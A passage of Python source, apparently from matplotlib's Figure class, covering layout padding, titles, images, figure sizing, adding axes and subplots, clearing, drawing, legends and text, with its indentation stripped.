todo = ['w_pad', 'h_pad', 'wspace', 'hspace']
for td in todo:
if td in kwargs and kwargs[td] is not None:
self._constrained_layout_pads[td] = kwargs[td]
else:
self._constrained_layout_pads[td] = (
rcParams['figure.constrained_layout.' + td])
def get_constrained_layout_pads(self, relative=False):
"""
Get padding for ``constrained_layout``.
Returns a list of `w_pad, h_pad` in inches and
`wspace` and `hspace` as fractions of the subplot.
See :doc:`/tutorials/intermediate/constrainedlayout_guide`.
Parameters
----------
relative : boolean
If `True`, then convert from inches to figure relative.
"""
w_pad = self._constrained_layout_pads['w_pad']
h_pad = self._constrained_layout_pads['h_pad']
wspace = self._constrained_layout_pads['wspace']
hspace = self._constrained_layout_pads['hspace']
if relative and (w_pad is not None or h_pad is not None):
renderer0 = layoutbox.get_renderer(self)
dpi = renderer0.dpi
w_pad = w_pad * dpi / renderer0.width
h_pad = h_pad * dpi / renderer0.height
return w_pad, h_pad, wspace, hspace
def autofmt_xdate(self, bottom=0.2, rotation=30, ha='right', which=None):
"""
Date ticklabels often overlap, so it is useful to rotate them
and right align them. Also, a common use case is a number of
subplots with shared xaxes where the x-axis is date data. The
ticklabels are often long, and it helps to rotate them on the
bottom subplot and turn them off on other subplots, as well as
turn off xlabels.
Parameters
----------
bottom : scalar
The bottom of the subplots for :meth:`subplots_adjust`.
rotation : angle in degrees
The rotation of the xtick labels.
ha : str
The horizontal alignment of the xticklabels.
which : {None, 'major', 'minor', 'both'}
Selects which ticklabels to rotate. Default is None which works
the same as major.
"""
allsubplots = all(hasattr(ax, 'is_last_row') for ax in self.axes)
if len(self.axes) == 1:
for label in self.axes[0].get_xticklabels(which=which):
label.set_ha(ha)
label.set_rotation(rotation)
else:
if allsubplots:
for ax in self.get_axes():
if ax.is_last_row():
for label in ax.get_xticklabels(which=which):
label.set_ha(ha)
label.set_rotation(rotation)
else:
for label in ax.get_xticklabels(which=which):
label.set_visible(False)
ax.set_xlabel('')
if allsubplots:
self.subplots_adjust(bottom=bottom)
self.stale = True
def get_children(self):
"""Get a list of artists contained in the figure."""
return [self.patch,
*self.artists,
*self.axes,
*self.lines,
*self.patches,
*self.texts,
*self.images,
*self.legends]
def contains(self, mouseevent):
"""
Test whether the mouse event occurred on the figure.
Returns
-------
bool, {}
"""
inside, info = self._default_contains(mouseevent, figure=self)
if inside is not None:
return inside, info
inside = self.bbox.contains(mouseevent.x, mouseevent.y)
return inside, {}
def get_window_extent(self, *args, **kwargs):
"""
Return the figure bounding box in display space. Arguments are ignored.
"""
return self.bbox
def suptitle(self, t, **kwargs):
"""
Add a centered title to the figure.
Parameters
----------
t : str
The title text.
x : float, default 0.5
The x location of the text in figure coordinates.
y : float, default 0.98
The y location of the text in figure coordinates.
horizontalalignment, ha : {'center', 'left', right'}, default: 'center'
The horizontal alignment of the text relative to (*x*, *y*).
verticalalignment, va : {'top', 'center', 'bottom', 'baseline'}, \
default: 'top'
The vertical alignment of the text relative to (*x*, *y*).
fontsize, size : default: :rc:`figure.titlesize`
The font size of the text. See `.Text.set_size` for possible
values.
fontweight, weight : default: :rc:`figure.titleweight`
The font weight of the text. See `.Text.set_weight` for possible
values.
Returns
-------
text
The `.Text` instance of the title.
Other Parameters
----------------
fontproperties : None or dict, optional
A dict of font properties. If *fontproperties* is given the
default values for font size and weight are taken from the
`FontProperties` defaults. :rc:`figure.titlesize` and
:rc:`figure.titleweight` are ignored in this case.
**kwargs
Additional kwargs are :class:`matplotlib.text.Text` properties.
Examples
--------
>>> fig.suptitle('This is the figure title', fontsize=12)
"""
manual_position = ('x' in kwargs or 'y' in kwargs)
x = kwargs.pop('x', 0.5)
y = kwargs.pop('y', 0.98)
if 'horizontalalignment' not in kwargs and 'ha' not in kwargs:
kwargs['horizontalalignment'] = 'center'
if 'verticalalignment' not in kwargs and 'va' not in kwargs:
kwargs['verticalalignment'] = 'top'
if 'fontproperties' not in kwargs:
if 'fontsize' not in kwargs and 'size' not in kwargs:
kwargs['size'] = rcParams['figure.titlesize']
if 'fontweight' not in kwargs and 'weight' not in kwargs:
kwargs['weight'] = rcParams['figure.titleweight']
sup = self.text(x, y, t, **kwargs)
if self._suptitle is not None:
self._suptitle.set_text(t)
self._suptitle.set_position((x, y))
self._suptitle.update_from(sup)
sup.remove()
else:
self._suptitle = sup
self._suptitle._layoutbox = None
if self._layoutbox is not None and not manual_position:
w_pad, h_pad, wspace, hspace = \
self.get_constrained_layout_pads(relative=True)
figlb = self._layoutbox
self._suptitle._layoutbox = layoutbox.LayoutBox(
parent=figlb, artist=self._suptitle,
name=figlb.name+'.suptitle')
# stack the suptitle on top of all the children.
# Some day this should be on top of all the children in the
# gridspec only.
for child in figlb.children:
if child is not self._suptitle._layoutbox:
layoutbox.vstack([self._suptitle._layoutbox,
child],
padding=h_pad*2., strength='required')
self.stale = True
return self._suptitle
def set_canvas(self, canvas):
"""
Set the canvas that contains the figure
Parameters
----------
canvas : FigureCanvas
"""
self.canvas = canvas
def figimage(self, X, xo=0, yo=0, alpha=None, norm=None, cmap=None,
vmin=None, vmax=None, origin=None, resize=False, **kwargs):
"""
Add a non-resampled image to the figure.
The image is attached to the lower or upper left corner depending on
*origin*.
Parameters
----------
X
The image data. This is an array of one of the following shapes:
- MxN: luminance (grayscale) values
- MxNx3: RGB values
- MxNx4: RGBA values
xo, yo : int
The *x*/*y* image offset in pixels.
alpha : None or float
The alpha blending value.
norm : :class:`matplotlib.colors.Normalize`
A :class:`.Normalize` instance to map the luminance to the
interval [0, 1].
cmap : str or :class:`matplotlib.colors.Colormap`
The colormap to use. Default: :rc:`image.cmap`.
vmin, vmax : scalar
If *norm* is not given, these values set the data limits for the
colormap.
origin : {'upper', 'lower'}
Indicates where the [0, 0] index of the array is in the upper left
or lower left corner of the axes. Defaults to :rc:`image.origin`.
resize : bool
If *True*, resize the figure to match the given image size.
Returns
-------
:class:`matplotlib.image.FigureImage`
Other Parameters
----------------
**kwargs
Additional kwargs are `.Artist` kwargs passed on to `.FigureImage`.
Notes
-----
figimage complements the axes image
(:meth:`~matplotlib.axes.Axes.imshow`) which will be resampled
to fit the current axes. If you want a resampled image to
fill the entire figure, you can define an
:class:`~matplotlib.axes.Axes` with extent [0, 0, 1, 1].
Examples::
f = plt.figure()
nx = int(f.get_figwidth() * f.dpi)
ny = int(f.get_figheight() * f.dpi)
data = np.random.random((ny, nx))
f.figimage(data)
plt.show()
"""
if resize:
dpi = self.get_dpi()
figsize = [x / dpi for x in (X.shape[1], X.shape[0])]
self.set_size_inches(figsize, forward=True)
im = mimage.FigureImage(self, cmap, norm, xo, yo, origin, **kwargs)
im.stale_callback = _stale_figure_callback
im.set_array(X)
im.set_alpha(alpha)
if norm is None:
im.set_clim(vmin, vmax)
self.images.append(im)
im._remove_method = self.images.remove
self.stale = True
return im
def set_size_inches(self, w, h=None, forward=True):
"""
Set the figure size in inches.
Call signatures::
fig.set_size_inches(w, h) # OR
fig.set_size_inches((w, h))
Parameters
----------
w : (float, float) or float
Width and height in inches (if height not specified as a separate
argument) or width.
h : float
Height in inches.
forward : bool, default: True
If ``True``, the canvas size is automatically updated, e.g.,
you can resize the figure window from the shell.
See Also
--------
matplotlib.Figure.get_size_inches
"""
if h is None: # Got called with a single pair as argument.
w, h = w
size = np.array([w, h])
if not np.isfinite(size).all() or (size <= 0).any():
raise ValueError(f'figure size must be positive finite not {size}')
self.bbox_inches.p1 = size
if forward:
canvas = getattr(self, 'canvas')
if canvas is not None:
dpi_ratio = getattr(canvas, '_dpi_ratio', 1)
manager = getattr(canvas, 'manager', None)
if manager is not None:
manager.resize(*(size * self.dpi / dpi_ratio).astype(int))
self.stale = True
def get_size_inches(self):
"""
Returns the current size of the figure in inches.
Returns
-------
size : ndarray
The size (width, height) of the figure in inches.
See Also
--------
matplotlib.Figure.set_size_inches
"""
return np.array(self.bbox_inches.p1)
def get_edgecolor(self):
"""Get the edge color of the Figure rectangle."""
return self.patch.get_edgecolor()
def get_facecolor(self):
"""Get the face color of the Figure rectangle."""
return self.patch.get_facecolor()
def get_figwidth(self):
"""Return the figure width as a float."""
return self.bbox_inches.width
def get_figheight(self):
"""Return the figure height as a float."""
return self.bbox_inches.height
def get_dpi(self):
"""Return the resolution in dots per inch as a float."""
return self.dpi
def get_frameon(self):
"""
Return the figure's background patch visibility, i.e.
whether the figure background will be drawn. Equivalent to
``Figure.patch.get_visible()``.
"""
return self.patch.get_visible()
def set_edgecolor(self, color):
"""
Set the edge color of the Figure rectangle.
Parameters
----------
color : color
"""
self.patch.set_edgecolor(color)
def set_facecolor(self, color):
"""
Set the face color of the Figure rectangle.
Parameters
----------
color : color
"""
self.patch.set_facecolor(color)
def set_dpi(self, val):
"""
Set the resolution of the figure in dots-per-inch.
Parameters
----------
val : float
"""
self.dpi = val
self.stale = True
def set_figwidth(self, val, forward=True):
"""
Set the width of the figure in inches.
Parameters
----------
val : float
forward : bool
"""
self.set_size_inches(val, self.get_figheight(), forward=forward)
def set_figheight(self, val, forward=True):
"""
Set the height of the figure in inches.
Parameters
----------
val : float
forward : bool
"""
self.set_size_inches(self.get_figwidth(), val, forward=forward)
def set_frameon(self, b):
"""
Set the figure's background patch visibility, i.e.
whether the figure background will be drawn. Equivalent to
``Figure.patch.set_visible()``.
Parameters
----------
b : bool
"""
self.patch.set_visible(b)
self.stale = True
frameon = property(get_frameon, set_frameon)
def delaxes(self, ax):
"""
Remove the `~matplotlib.axes.Axes` *ax* from the figure and update the
current axes.
"""
self._axstack.remove(ax)
for func in self._axobservers:
func(self)
self.stale = True
def add_artist(self, artist, clip=False):
"""
Add any :class:`~matplotlib.artist.Artist` to the figure.
Usually artists are added to axes objects using
:meth:`matplotlib.axes.Axes.add_artist`, but use this method in the
rare cases that adding directly to the figure is necessary.
Parameters
----------
artist : `~matplotlib.artist.Artist`
The artist to add to the figure. If the added artist has no
transform previously set, its transform will be set to
``figure.transFigure``.
clip : bool, optional, default ``False``
An optional parameter ``clip`` determines whether the added artist
should be clipped by the figure patch. Default is *False*,
i.e. no clipping.
Returns
-------
artist : The added `~matplotlib.artist.Artist`
"""
artist.set_figure(self)
self.artists.append(artist)
artist._remove_method = self.artists.remove
if not artist.is_transform_set():
artist.set_transform(self.transFigure)
if clip:
artist.set_clip_path(self.patch)
self.stale = True
return artist
def _make_key(self, *args, **kwargs):
"""Make a hashable key out of args and kwargs."""
def fixitems(items):
# items may have arrays and lists in them, so convert them
# to tuples for the key
ret = []
for k, v in items:
# some objects can define __getitem__ without being
# iterable and in those cases the conversion to tuples
# will fail. So instead of using the np.iterable(v) function
# we simply try and convert to a tuple, and proceed if not.
try:
v = tuple(v)
except Exception:
pass
ret.append((k, v))
return tuple(ret)
def fixlist(args):
ret = []
for a in args:
if np.iterable(a):
a = tuple(a)
ret.append(a)
return tuple(ret)
key = fixlist(args), fixitems(kwargs.items())
return key
def _process_projection_requirements(
self, *args, polar=False, projection=None, **kwargs):
"""
Handle the args/kwargs to add_axes/add_subplot/gca, returning::
(axes_proj_class, proj_class_kwargs, proj_stack_key)
which can be used for new axes initialization/identification.
"""
if polar:
if projection is not None and projection != 'polar':
raise ValueError(
"polar=True, yet projection=%r. "
"Only one of these arguments should be supplied." %
projection)
projection = 'polar'
if isinstance(projection, str) or projection is None:
projection_class = projections.get_projection_class(projection)
elif hasattr(projection, '_as_mpl_axes'):
projection_class, extra_kwargs = projection._as_mpl_axes()
kwargs.update(**extra_kwargs)
else:
raise TypeError('projection must be a string, None or implement a '
'_as_mpl_axes method. Got %r' % projection)
# Make the key without projection kwargs, this is used as a unique
# lookup for axes instances
key = self._make_key(*args, **kwargs)
return projection_class, kwargs, key
@docstring.dedent_interpd
def add_axes(self, *args, **kwargs):
"""
Add an axes to the figure.
Call signatures::
add_axes(rect, projection=None, polar=False, **kwargs)
add_axes(ax)
Parameters
----------
rect : sequence of float
The dimensions [left, bottom, width, height] of the new axes. All
quantities are in fractions of figure width and height.
projection : {None, 'aitoff', 'hammer', 'lambert', 'mollweide', \
'polar', 'rectilinear', str}, optional
The projection type of the `~.axes.Axes`. *str* is the name of
a custom projection, see `~matplotlib.projections`. The default
None results in a 'rectilinear' projection.
polar : boolean, optional
If True, equivalent to projection='polar'.
sharex, sharey : `~.axes.Axes`, optional
Share the x or y `~matplotlib.axis` with sharex and/or sharey.
The axis will have the same limits, ticks, and scale as the axis
of the shared axes.
label : str
A label for the returned axes.
Other Parameters
----------------
**kwargs
This method also takes the keyword arguments for
the returned axes class. The keyword arguments for the
rectilinear axes class `~.axes.Axes` can be found in
the following table but there might also be other keyword
arguments if another projection is used, see the actual axes
class.
%(Axes)s
Returns
-------
axes : `~.axes.Axes` (or a subclass of `~.axes.Axes`)
The returned axes class depends on the projection used. It is
`~.axes.Axes` if rectilinear projection are used and
`.projections.polar.PolarAxes` if polar projection
are used.
Notes
-----
If the figure already has an axes with key (*args*,
*kwargs*) then it will simply make that axes current and
return it. This behavior is deprecated. Meanwhile, if you do
not want this behavior (i.e., you want to force the creation of a
new axes), you must use a unique set of args and kwargs. The axes
*label* attribute has been exposed for this purpose: if you want
two axes that are otherwise identical to be added to the figure,
make sure you give them unique labels.
In rare circumstances, `.add_axes` may be called with a single
argument, a axes instance already created in the present figure but
not in the figure's list of axes.
See Also
--------
.Figure.add_subplot
.pyplot.subplot
.pyplot.axes
.Figure.subplots
.pyplot.subplots
Examples
--------
Some simple examples::
rect = l, b, w, h
fig = plt.figure()
fig.add_axes(rect, label=label1)
fig.add_axes(rect, label=label2)
fig.add_axes(rect, frameon=False, facecolor='g')
fig.add_axes(rect, polar=True)
ax = fig.add_axes(rect, projection='polar')
fig.delaxes(ax)
fig.add_axes(ax)
"""
if not len(args):
return
# shortcut the projection "key" modifications later on, if an axes
# with the exact args/kwargs exists, return it immediately.
key = self._make_key(*args, **kwargs)
ax = self._axstack.get(key)
if ax is not None:
self.sca(ax)
return ax
if isinstance(args[0], Axes):
a = args[0]
if a.get_figure() is not self:
raise ValueError(
"The Axes must have been created in the present figure")
else:
rect = args[0]
if not np.isfinite(rect).all():
raise ValueError('all entries in rect must be finite '
'not {}'.format(rect))
projection_class, kwargs, key = \
self._process_projection_requirements(*args, **kwargs)
# check that an axes of this type doesn't already exist, if it
# does, set it as active and return it
ax = self._axstack.get(key)
if isinstance(ax, projection_class):
self.sca(ax)
return ax
# create the new axes using the axes class given
a = projection_class(self, rect, **kwargs)
return self._add_axes_internal(key, a)
@docstring.dedent_interpd
def add_subplot(self, *args, **kwargs):
"""
Add an `~.axes.Axes` to the figure as part of a subplot arrangement.
Call signatures::
add_subplot(nrows, ncols, index, **kwargs)
add_subplot(pos, **kwargs)
add_subplot(ax)
add_subplot()
Parameters
----------
*args
Either a 3-digit integer or three separate integers
describing the position of the subplot. If the three
integers are *nrows*, *ncols*, and *index* in order, the
subplot will take the *index* position on a grid with *nrows*
rows and *ncols* columns. *index* starts at 1 in the upper left
corner and increases to the right.
*pos* is a three digit integer, where the first digit is the
number of rows, the second the number of columns, and the third
the index of the subplot. i.e. fig.add_subplot(235) is the same as
fig.add_subplot(2, 3, 5). Note that all integers must be less than
10 for this form to work.
If no positional arguments are passed, defaults to (1, 1, 1).
In rare circumstances, `.add_subplot` may be called with a single
argument, a subplot axes instance already created in the
present figure but not in the figure's list of axes.
projection : {None, 'aitoff', 'hammer', 'lambert', 'mollweide', \
'polar', 'rectilinear', str}, optional
The projection type of the subplot (`~.axes.Axes`). *str* is the
name of a custom projection, see `~matplotlib.projections`. The
default None results in a 'rectilinear' projection.
polar : boolean, optional
If True, equivalent to projection='polar'.
sharex, sharey : `~.axes.Axes`, optional
Share the x or y `~matplotlib.axis` with sharex and/or sharey.
The axis will have the same limits, ticks, and scale as the axis
of the shared axes.
label : str
A label for the returned axes.
Other Parameters
----------------
**kwargs
This method also takes the keyword arguments for the returned axes
base class; except for the *figure* argument. The keyword arguments
for the rectilinear base class `~.axes.Axes` can be found in
the following table but there might also be other keyword
arguments if another projection is used.
%(Axes)s
Returns
-------
axes : `.axes.SubplotBase`, or another subclass of `~.axes.Axes`
The axes of the subplot. The returned axes base class depends on
the projection used. It is `~.axes.Axes` if rectilinear projection
are used and `.projections.polar.PolarAxes` if polar projection
are used. The returned axes is then a subplot subclass of the
base class.
Notes
-----
If the figure already has a subplot with key (*args*,
*kwargs*) then it will simply make that subplot current and
return it. This behavior is deprecated. Meanwhile, if you do
not want this behavior (i.e., you want to force the creation of a
new subplot), you must use a unique set of args and kwargs. The axes
*label* attribute has been exposed for this purpose: if you want
two subplots that are otherwise identical to be added to the figure,
make sure you give them unique labels.
See Also
--------
.Figure.add_axes
.pyplot.subplot
.pyplot.axes
.Figure.subplots
.pyplot.subplots
Examples
--------
::
fig = plt.figure()
fig.add_subplot(221)
# equivalent but more general
ax1 = fig.add_subplot(2, 2, 1)
# add a subplot with no frame
ax2 = fig.add_subplot(222, frameon=False)
# add a polar subplot
fig.add_subplot(223, projection='polar')
# add a red subplot that share the x-axis with ax1
fig.add_subplot(224, sharex=ax1, facecolor='red')
#delete x2 from the figure
fig.delaxes(ax2)
#add x2 to the figure again
fig.add_subplot(ax2)
"""
if not len(args):
args = (1, 1, 1)
if len(args) == 1 and isinstance(args[0], Integral):
if not 100 <= args[0] <= 999:
raise ValueError("Integer subplot specification must be a "
"three-digit number, not {}".format(args[0]))
args = tuple(map(int, str(args[0])))
if 'figure' in kwargs:
# Axes itself allows for a 'figure' kwarg, but since we want to
# bind the created Axes to self, it is not allowed here.
raise TypeError(
"add_subplot() got an unexpected keyword argument 'figure'")
if isinstance(args[0], SubplotBase):
a = args[0]
if a.get_figure() is not self:
raise ValueError(
"The Subplot must have been created in the present figure")
# make a key for the subplot (which includes the axes object id
# in the hash)
key = self._make_key(*args, **kwargs)
else:
projection_class, kwargs, key = \
self._process_projection_requirements(*args, **kwargs)
# try to find the axes with this key in the stack
ax = self._axstack.get(key)
if ax is not None:
if isinstance(ax, projection_class):
# the axes already existed, so set it as active & return
self.sca(ax)
return ax
else:
# Undocumented convenience behavior:
# subplot(111); subplot(111, projection='polar')
# will replace the first with the second.
# Without this, add_subplot would be simpler and
# more similar to add_axes.
self._axstack.remove(ax)
a = subplot_class_factory(projection_class)(self, *args, **kwargs)
return self._add_axes_internal(key, a)
def _add_axes_internal(self, key, ax):
"""Private helper for `add_axes` and `add_subplot`."""
self._axstack.add(key, ax)
self.sca(ax)
ax._remove_method = self._remove_ax
self.stale = True
ax.stale_callback = _stale_figure_callback
return ax
def subplots(self, nrows=1, ncols=1, sharex=False, sharey=False,
squeeze=True, subplot_kw=None, gridspec_kw=None):
"""
Add a set of subplots to this figure.
This utility wrapper makes it convenient to create common layouts of
subplots in a single call.
Parameters
----------
nrows, ncols : int, optional, default: 1
Number of rows/columns of the subplot grid.
sharex, sharey : bool or {'none', 'all', 'row', 'col'}, default: False
Controls sharing of properties among x (`sharex`) or y (`sharey`)
axes:
- True or 'all': x- or y-axis will be shared among all subplots.
- False or 'none': each subplot x- or y-axis will be independent.
- 'row': each subplot row will share an x- or y-axis.
- 'col': each subplot column will share an x- or y-axis.
When subplots have a shared x-axis along a column, only the x tick
labels of the bottom subplot are created. Similarly, when subplots
have a shared y-axis along a row, only the y tick labels of the
first column subplot are created. To later turn other subplots'
ticklabels on, use `~matplotlib.axes.Axes.tick_params`.
squeeze : bool, optional, default: True
- If True, extra dimensions are squeezed out from the returned
array of Axes:
- if only one subplot is constructed (nrows=ncols=1), the
resulting single Axes object is returned as a scalar.
- for Nx1 or 1xM subplots, the returned object is a 1D numpy
object array of Axes objects.
- for NxM, subplots with N>1 and M>1 are returned as a 2D array.
- If False, no squeezing at all is done: the returned Axes object
is always a 2D array containing Axes instances, even if it ends
up being 1x1.
subplot_kw : dict, optional
Dict with keywords passed to the
:meth:`~matplotlib.figure.Figure.add_subplot` call used to create
each subplot.
gridspec_kw : dict, optional
Dict with keywords passed to the
`~matplotlib.gridspec.GridSpec` constructor used to create
the grid the subplots are placed on.
Returns
-------
ax : `~.axes.Axes` object or array of Axes objects.
*ax* can be either a single `~matplotlib.axes.Axes` object or
an array of Axes objects if more than one subplot was created. The
dimensions of the resulting array can be controlled with the
squeeze keyword, see above.
Examples
--------
::
# First create some toy data:
x = np.linspace(0, 2*np.pi, 400)
y = np.sin(x**2)
# Create a figure
plt.figure()
# Create a subplot
ax = fig.subplots()
ax.plot(x, y)
ax.set_title('Simple plot')
# Create two subplots and unpack the output array immediately
ax1, ax2 = fig.subplots(1, 2, sharey=True)
ax1.plot(x, y)
ax1.set_title('Sharing Y axis')
ax2.scatter(x, y)
# Create four polar axes and access them through the returned array
axes = fig.subplots(2, 2, subplot_kw=dict(polar=True))
axes[0, 0].plot(x, y)
axes[1, 1].scatter(x, y)
# Share a X axis with each column of subplots
fig.subplots(2, 2, sharex='col')
# Share a Y axis with each row of subplots
fig.subplots(2, 2, sharey='row')
# Share both X and Y axes with all subplots
fig.subplots(2, 2, sharex='all', sharey='all')
# Note that this is the same as
fig.subplots(2, 2, sharex=True, sharey=True)
See Also
--------
.pyplot.subplots
.Figure.add_subplot
.pyplot.subplot
"""
if isinstance(sharex, bool):
sharex = "all" if sharex else "none"
if isinstance(sharey, bool):
sharey = "all" if sharey else "none"
# This check was added because it is very easy to type
# `subplots(1, 2, 1)` when `subplot(1, 2, 1)` was intended.
# In most cases, no error will ever occur, but mysterious behavior
# will result because what was intended to be the subplot index is
# instead treated as a bool for sharex.
if isinstance(sharex, Integral):
cbook._warn_external(
"sharex argument to subplots() was an integer. Did you "
"intend to use subplot() (without 's')?")
cbook._check_in_list(["all", "row", "col", "none"],
sharex=sharex, sharey=sharey)
if subplot_kw is None:
subplot_kw = {}
if gridspec_kw is None:
gridspec_kw = {}
# don't mutate kwargs passed by user...
subplot_kw = subplot_kw.copy()
gridspec_kw = gridspec_kw.copy()
if self.get_constrained_layout():
gs = GridSpec(nrows, ncols, figure=self, **gridspec_kw)
else:
# this should turn constrained_layout off if we don't want it
gs = GridSpec(nrows, ncols, figure=None, **gridspec_kw)
self._gridspecs.append(gs)
# Create array to hold all axes.
axarr = np.empty((nrows, ncols), dtype=object)
for row in range(nrows):
for col in range(ncols):
shared_with = {"none": None, "all": axarr[0, 0],
"row": axarr[row, 0], "col": axarr[0, col]}
subplot_kw["sharex"] = shared_with[sharex]
subplot_kw["sharey"] = shared_with[sharey]
axarr[row, col] = self.add_subplot(gs[row, col], **subplot_kw)
# turn off redundant tick labeling
if sharex in ["col", "all"]:
# turn off all but the bottom row
for ax in axarr[:-1, :].flat:
ax.xaxis.set_tick_params(which='both',
labelbottom=False, labeltop=False)
ax.xaxis.offsetText.set_visible(False)
if sharey in ["row", "all"]:
# turn off all but the first column
for ax in axarr[:, 1:].flat:
ax.yaxis.set_tick_params(which='both',
labelleft=False, labelright=False)
ax.yaxis.offsetText.set_visible(False)
if squeeze:
# Discarding unneeded dimensions that equal 1. If we only have one
# subplot, just return it instead of a 1-element array.
return axarr.item() if axarr.size == 1 else axarr.squeeze()
else:
# Returned axis array will be always 2-d, even if nrows=ncols=1.
return axarr
def _remove_ax(self, ax):
def _reset_locators_and_formatters(axis):
# Set the formatters and locators to be associated with axis
# (where previously they may have been associated with another
# Axis isntance)
#
# Because set_major_formatter() etc. force isDefault_* to be False,
# we have to manually check if the original formatter was a
# default and manually set isDefault_* if that was the case.
majfmt = axis.get_major_formatter()
isDefault = majfmt.axis.isDefault_majfmt
axis.set_major_formatter(majfmt)
if isDefault:
majfmt.axis.isDefault_majfmt = True
majloc = axis.get_major_locator()
isDefault = majloc.axis.isDefault_majloc
axis.set_major_locator(majloc)
if isDefault:
majloc.axis.isDefault_majloc = True
minfmt = axis.get_minor_formatter()
isDefault = majloc.axis.isDefault_minfmt
axis.set_minor_formatter(minfmt)
if isDefault:
minfmt.axis.isDefault_minfmt = True
minloc = axis.get_minor_locator()
isDefault = majloc.axis.isDefault_minloc
axis.set_minor_locator(minloc)
if isDefault:
minloc.axis.isDefault_minloc = True
def _break_share_link(ax, grouper):
siblings = grouper.get_siblings(ax)
if len(siblings) > 1:
grouper.remove(ax)
for last_ax in siblings:
if ax is not last_ax:
return last_ax
return None
self.delaxes(ax)
last_ax = _break_share_link(ax, ax._shared_y_axes)
if last_ax is not None:
_reset_locators_and_formatters(last_ax.yaxis)
last_ax = _break_share_link(ax, ax._shared_x_axes)
if last_ax is not None:
_reset_locators_and_formatters(last_ax.xaxis)
def clf(self, keep_observers=False):
"""
Clear the figure.
Set *keep_observers* to True if, for example,
a gui widget is tracking the axes in the figure.
"""
self.suppressComposite = None
self.callbacks = cbook.CallbackRegistry()
for ax in tuple(self.axes): # Iterate over the copy.
ax.cla()
self.delaxes(ax) # removes ax from self._axstack
toolbar = getattr(self.canvas, 'toolbar', None)
if toolbar is not None:
toolbar.update()
self._axstack.clear()
self.artists = []
self.lines = []
self.patches = []
self.texts = []
self.images = []
self.legends = []
if not keep_observers:
self._axobservers = []
self._suptitle = None
if self.get_constrained_layout():
layoutbox.nonetree(self._layoutbox)
self.stale = True
def clear(self, keep_observers=False):
"""
Clear the figure -- synonym for :meth:`clf`.
"""
self.clf(keep_observers=keep_observers)
@allow_rasterization
def draw(self, renderer):
"""
Render the figure using :class:`matplotlib.backend_bases.RendererBase`
instance *renderer*.
"""
# draw the figure bounding box, perhaps none for white figure
if not self.get_visible():
return
artists = self.get_children()
artists.remove(self.patch)
artists = sorted(
(artist for artist in artists if not artist.get_animated()),
key=lambda artist: artist.get_zorder())
for ax in self.axes:
locator = ax.get_axes_locator()
if locator:
pos = locator(ax, renderer)
ax.apply_aspect(pos)
else:
ax.apply_aspect()
for child in ax.get_children():
if hasattr(child, 'apply_aspect'):
locator = child.get_axes_locator()
if locator:
pos = locator(child, renderer)
child.apply_aspect(pos)
else:
child.apply_aspect()
try:
renderer.open_group('figure', gid=self.get_gid())
if self.get_constrained_layout() and self.axes:
self.execute_constrained_layout(renderer)
if self.get_tight_layout() and self.axes:
try:
self.tight_layout(renderer,
**self._tight_parameters)
except ValueError:
pass
# ValueError can occur when resizing a window.
self.patch.draw(renderer)
mimage._draw_list_compositing_images(
renderer, self, artists, self.suppressComposite)
renderer.close_group('figure')
finally:
self.stale = False
self._cachedRenderer = renderer
self.canvas.draw_event(renderer)
def draw_artist(self, a):
"""
Draw :class:`matplotlib.artist.Artist` instance *a* only.
This is available only after the figure is drawn.
"""
if self._cachedRenderer is None:
raise AttributeError("draw_artist can only be used after an "
"initial draw which caches the renderer")
a.draw(self._cachedRenderer)
def get_axes(self):
"""
Return a list of axes in the Figure. You can access and modify the
axes in the Figure through this list.
Do not modify the list itself. Instead, use `~Figure.add_axes`,
`~.Figure.subplot` or `~.Figure.delaxes` to add or remove an axes.
Note: This is equivalent to the property `~.Figure.axes`.
"""
return self.axes
# Note: in the docstring below, the newlines in the examples after the
# calls to legend() allow replacing it with figlegend() to generate the
# docstring of pyplot.figlegend.
@docstring.dedent_interpd
def legend(self, *args, **kwargs):
"""
Place a legend on the figure.
To make a legend from existing artists on every axes::
legend()
To make a legend for a list of lines and labels::
legend(
(line1, line2, line3),
('label1', 'label2', 'label3'),
loc='upper right')
These can also be specified by keyword::
legend(
handles=(line1, line2, line3),
labels=('label1', 'label2', 'label3'),
loc='upper right')
Parameters
----------
handles : list of `.Artist`, optional
A list of Artists (lines, patches) to be added to the legend.
Use this together with *labels*, if you need full control on what
is shown in the legend and the automatic mechanism described above
is not sufficient.
The length of handles and labels should be the same in this
case. If they are not, they are truncated to the smaller length.
labels : list of str, optional
A list of labels to show next to the artists.
Use this together with *handles*, if you need full control on what
is shown in the legend and the automatic mechanism described above
is not sufficient.
Other Parameters
----------------
%(_legend_kw_doc)s
Returns
-------
:class:`matplotlib.legend.Legend` instance
Notes
-----
Not all kinds of artist are supported by the legend command. See
:doc:`/tutorials/intermediate/legend_guide` for details.
"""
handles, labels, extra_args, kwargs = mlegend._parse_legend_args(
self.axes,
*args,
**kwargs)
# check for third arg
if len(extra_args):
# cbook.warn_deprecated(
# "2.1",
# message="Figure.legend will accept no more than two "
# "positional arguments in the future. Use "
# "'fig.legend(handles, labels, loc=location)' "
# "instead.")
# kwargs['loc'] = extra_args[0]
# extra_args = extra_args[1:]
pass
l = mlegend.Legend(self, handles, labels, *extra_args, **kwargs)
self.legends.append(l)
l._remove_method = self.legends.remove
self.stale = True
return l
@cbook._delete_parameter("3.1", "withdash")
@docstring.dedent_interpd
def text(self, x, y, s, fontdict=None, withdash=False, **kwargs):
"""
Add text to figure.
Parameters
----------
x, y : float
The position to place the text. By default, this is in figure
coordinates, floats in [0, 1]. The coordinate system can be changed
using the *transform* keyword.
s : str
The text string.
fontdict : dictionary, optional, default: None
A dictionary to override the default text properties. If fontdict
is None, the defaults are determined by your rc parameters. A
property in *kwargs* override the same property in fontdict.
withdash : boolean, optional, default: False
Creates a `~matplotlib.text.TextWithDash` instance instead of a
`~matplotlib.text.Text` instance.
Other Parameters
----------------
**kwargs : `~matplotlib.text.Text` properties
Other miscellaneous text parameters.
%(Text)s
Returns
-------
text : `~.text.Text`
See Also
--------
.Axes.text
.pyplot.text
"""
default = dict(transform=self.transFigure)
if (withdash
and withdash is not cbook.deprecation._deprecated_parameter):
text = TextWithDash(x=x, y=y, text=s)
else:
text = Text(x=x, y=y, text=s)
text.update(default)
if fontdict is not None:
text.update(fontdict)
text.update(kwargs)
text.set_figure(self)
text.stale_callback = _stale_figure_callback
self.texts.append(text)
text._remove_method = self.texts.remove
self.stale = True
return text
def _set_artist_props(self, a):
if a != self:
a.set_figure(self)
a.stale_callback = _stale_figure_callback
a.set_transform(self.transFigure)
@docstring.dedent_interpd
def gca(self, **kwargs):
"""
Get the current axes, creating one if necessary.
